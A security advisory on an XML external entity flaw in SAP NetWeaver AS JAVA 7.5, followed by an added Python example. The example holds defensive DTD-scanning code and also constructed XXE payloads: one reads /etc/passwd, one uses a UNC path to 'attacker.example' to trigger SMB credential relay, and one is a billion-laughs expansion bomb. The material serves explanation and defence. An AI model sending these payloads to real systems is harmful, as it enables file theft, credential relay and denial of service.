Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.5
Vendor URL: SAP
Vendor response: 10.03.2016
Date of Public Advisory: 08.08.2016
Reference: SAP Security Note 2296909
Author: Vahagn Vardanyan (ERPScan)
1) The vulnerability allows an attacker to perform a DoS attack (for example, an XML entity expansion attack).
2) It enables an SMB Relay attack, a type of man-in-the-middle attack in which the attacker induces the victim to authenticate to a machine under the attacker's control and then relays the credentials to the target. The attacker forwards the authentication exchange in both directions, which gives them access to the target.
An attacker can exploit the XML external entity vulnerability by sending specially crafted, unauthorized XML requests that are processed by the server-side XML parser, including any external entity declarations they carry. In this way the attacker can gain unauthorized access to the OS filesystem of the server.
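The following Python script is an added example, not code from the ERPScan advisory or from SAP. It uses only the standard library and shows the three payload classes named above (file disclosure, a UNC path that triggers SMB authentication for a relay, and entity expansion for DoS), a pre-parse guard that rejects any document carrying a DOCTYPE, and an estimate of how far an entity chain would expand without actually expanding it. Python's expat does not fetch external entities on its own, so nothing here reproduces the SAP bug; the hostname `attacker.example`, the paths and all payloads are constructed placeholders.

```python
"""XXE triage helpers: payload anatomy, a DTD-rejecting guard and an amplification estimate.

Added example, standard library only. Hostnames, paths and payloads are constructed.
"""
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat

# Constructed payload 1: file disclosure through an external general entity.
FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<r>&xxe;</r>"""

# Constructed payload 2: a UNC path. A Java parser on Windows that resolves this
# entity opens an SMB session to the (hypothetical) attacker host and offers the
# service account's credentials, which is exactly what an SMB relay needs.
SMB_RELAY = b"""<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "\\\\attacker.example\\share\\x.dtd"> ]>
<r>&xxe;</r>"""


def entity_expansion_payload(depth: int = 4, fanout: int = 10) -> bytes:
    """Constructed payload 3: nested internal entities, each level referencing
    the previous one `fanout` times (the 'billion laughs' DoS)."""
    decls = ['<!ENTITY e0 "lol">']
    for i in range(1, depth + 1):
        refs = f"&e{i - 1};" * fanout
        decls.append(f'<!ENTITY e{i} "{refs}">')
    dtd = " ".join(decls)
    return f'<?xml version="1.0"?>\n<!DOCTYPE r [ {dtd} ]>\n<r>&e{depth};</r>'.encode()


class DoctypeRejected(ValueError):
    """Raised by safe_parse when the document carries a DTD."""


class _PrologDone(Exception):
    """Internal: abort parsing once the prolog (and any DTD) has been read."""


def scan_dtd(data: bytes) -> dict:
    """Read only the prolog and report what the DTD declares.

    Parsing is aborted at the end of the DOCTYPE (or at the root element when
    there is none), so entity references in content are never expanded and
    external identifiers are never fetched: the scanner cannot itself be DoSed.
    """
    report = {"doctype": None, "internal": {}, "external": {}}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            return
        if value is None:          # external entity: SYSTEM/PUBLIC identifier
            report["external"][name] = sysid
        else:                      # internal entity: literal replacement text
            report["internal"][name] = value

    def stop(*_):
        raise _PrologDone

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.EndDoctypeDeclHandler = stop
    parser.StartElementHandler = stop
    try:
        parser.Parse(data, True)
    except _PrologDone:
        pass
    return report


def safe_parse(data: bytes) -> ET.Element:
    """Refuse any document that declares a DTD, then parse it normally."""
    report = scan_dtd(data)
    if report["doctype"] is not None:
        raise DoctypeRejected(
            f"DOCTYPE {report['doctype']!r} present; external entities: {report['external']}")
    return ET.fromstring(data)


_REF = re.compile(r"&([^&;\s]+);")


def expansion_size(data: bytes, entity: str) -> int:
    """Bytes that `entity` would expand to, computed from the declarations alone."""
    defs = scan_dtd(data)["internal"]
    memo: dict = {}

    def size(name: str, active: frozenset) -> int:
        if name in active:
            raise ValueError(f"recursive entity {name!r}")
        if name not in memo:
            text = defs[name]
            literal = len(_REF.sub("", text).encode("utf-8"))
            memo[name] = literal + sum(size(r, active | {name}) for r in _REF.findall(text))
        return memo[name]

    return size(entity, frozenset())
```

`scan_dtd` is the check worth keeping: a service that never needs a DTD can refuse every document with one before the real parser sees it, which shuts down all three impacts at once. `expansion_size` shows why the DoS variant is not a matter of payload size: a DTD of a few hundred bytes with nine levels of fan-out 10 resolves to three gigabytes of text. On the Java side the corresponding control is to disable DOCTYPE declarations and external general entities on the JAXP parser factory (for Xerces, the `http://apache.org/xml/features/disallow-doctype-decl` feature); the advisory does not say which parser configuration SAP changed, so treat that as general hardening guidance rather than the content of the note.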